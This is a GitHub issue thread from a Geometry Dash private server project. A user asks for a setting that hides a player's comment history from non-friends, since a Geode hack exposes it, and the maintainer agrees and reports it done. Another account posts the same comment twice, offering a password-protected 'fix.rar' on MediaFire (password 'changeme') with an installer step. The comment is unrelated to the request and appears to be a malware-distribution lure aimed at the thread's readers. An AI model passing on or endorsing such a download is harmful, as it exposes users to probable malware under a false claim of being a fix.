### ISSUE TITLE
Add toggle to hide history comments section in profile player for private accounts

### ISSUE THREAD

**Issue by Fenix668** [MegaSa1nt/GMDprivateServer#205]
There is a hack on geode that unlocks the history comments  in the player profile even when they keep it to me or friends even if not in common. It is possible to make a toggle on misc.php to prevent the comments section, even when private, from being viewed by others? Obviously if it is on "friends" only those in common should be considered, otherwise if they are not even friends the comments section should be hidden.

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MegaSa1nt** [comment]
> There is a hack on geode that unlocks the history comments in the player profile even when they keep it to me or friends even if not in common. It is possible to make a toggle on misc.php to prevent the comments section, even when private, from being viewed by others?

Sure

**Comment by MegaSa1nt** [comment]
Done, won't do config
